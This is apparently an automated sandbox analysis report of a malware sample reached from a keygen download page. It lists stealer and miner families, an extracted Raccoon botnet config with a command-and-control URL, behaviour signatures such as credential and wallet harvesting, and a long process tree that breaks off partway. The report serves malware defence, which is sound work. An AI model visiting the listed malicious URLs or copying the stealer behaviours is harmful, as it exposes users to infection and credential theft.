Resubmissions

18-04-2021 09:11

210418-l2b52pc3js 10

Analysis

  • max time kernel
    1780s
  • max time network
    1751s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    18-04-2021 09:11

General

  • Target

    https://keygenit.com/d/59def7ae481psn8p58q.html

  • Sample

    210418-l2b52pc3js

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 32 IoCs
  • Loads dropped DLL 14 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 13 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    PID:2852
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2836
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/59def7ae481psn8p58q.html
      1⤵
      • Enumerates system info in registry
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:644
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffbafb54f50,0x7ffbafb54f60,0x7ffbafb54f70
        2⤵
          PID:1452
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1592 /prefetch:2
          2⤵
            PID:3760
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1656 /prefetch:8
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:3648
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2252 /prefetch:8
            2⤵
              PID:1956
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2864 /prefetch:1
              2⤵
                PID:1356
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2856 /prefetch:1
                2⤵
                  PID:1648
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                  2⤵
                    PID:1624
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
                    2⤵
                      PID:4068
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
                      2⤵
                        PID:496
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
                        2⤵
                          PID:1040
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4808 /prefetch:8
                          2⤵
                            PID:4312
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5224 /prefetch:8
                            2⤵
                              PID:4544
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5372 /prefetch:8
                              2⤵
                                PID:4604
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5316 /prefetch:8
                                2⤵
                                  PID:4656
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5352 /prefetch:8
                                  2⤵
                                    PID:4692
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5388 /prefetch:8
                                    2⤵
                                      PID:4728
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5484 /prefetch:8
                                      2⤵
                                        PID:4764
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5348 /prefetch:8
                                        2⤵
                                          PID:4800
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5304 /prefetch:8
                                          2⤵
                                            PID:4836
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5688 /prefetch:8
                                            2⤵
                                              PID:4848
                                            • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                              "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                              2⤵
                                                PID:4908
                                                • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6ce8ea890,0x7ff6ce8ea8a0,0x7ff6ce8ea8b0
                                                  3⤵
                                                    PID:4928
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3596 /prefetch:8
                                                  2⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4980
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5416 /prefetch:8
                                                  2⤵
                                                    PID:5028
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5412 /prefetch:8
                                                    2⤵
                                                      PID:5044
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5476 /prefetch:8
                                                      2⤵
                                                        PID:5056
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5740 /prefetch:8
                                                        2⤵
                                                          PID:4172
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5772 /prefetch:8
                                                          2⤵
                                                            PID:4220
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5728 /prefetch:8
                                                            2⤵
                                                              PID:1332
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5796 /prefetch:8
                                                              2⤵
                                                                PID:2104
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5820 /prefetch:8
                                                                2⤵
                                                                  PID:4428
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5832 /prefetch:8
                                                                  2⤵
                                                                    PID:4524
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5784 /prefetch:8
                                                                    2⤵
                                                                      PID:4344
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6732 /prefetch:8
                                                                      2⤵
                                                                        PID:4628
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6744 /prefetch:8
                                                                        2⤵
                                                                          PID:4664
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6756 /prefetch:8
                                                                          2⤵
                                                                            PID:4648
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6768 /prefetch:8
                                                                            2⤵
                                                                              PID:4696
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6808 /prefetch:8
                                                                              2⤵
                                                                                PID:4768
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6820 /prefetch:8
                                                                                2⤵
                                                                                  PID:4828
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6832 /prefetch:8
                                                                                  2⤵
                                                                                    PID:4820
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6856 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4860
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7880 /prefetch:8
                                                                                      2⤵
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:4888
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6780 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4720
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8748 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4556
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8760 /prefetch:8
                                                                                          2⤵
                                                                                            PID:5116
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8772 /prefetch:8
                                                                                            2⤵
                                                                                              PID:2344
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8784 /prefetch:8
                                                                                              2⤵
                                                                                                PID:4268
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8796 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:4644
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8372 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:2280
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5736 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:4128
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8552 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:5048
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8392 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:4544
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9168 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:4864
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3516 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:4584
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4296 /prefetch:8
                                                                                                              2⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:5056
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:4364
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:8
                                                                                                                2⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:2228
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3908 /prefetch:8
                                                                                                                2⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:4684
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5560 /prefetch:8
                                                                                                                2⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:4788
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5196 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:1004
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2124 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:4744
                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\89.259.200\software_reporter_tool.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\89.259.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=e0H8kq74OZ3+iUS8qK+wXXEsoffPYruSChU5n9cJ --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4872
                                                                                                                    • \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.259.200\software_reporter_tool.exe
                                                                                                                      "c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.259.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=89.259.200 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff720deac28,0x7ff720deac38,0x7ff720deac48
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:1868
                                                                                                                    • \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.259.200\software_reporter_tool.exe
                                                                                                                      "c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.259.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_4872_ROSTLUWIEXLVAYMC" --sandboxed-process-id=2 --init-done-notifier=716 --sandbox-mojo-pipe-token=5242652435461419868 --mojo-platform-channel-handle=692 --engine=2
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:3816
                                                                                                                    • \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.259.200\software_reporter_tool.exe
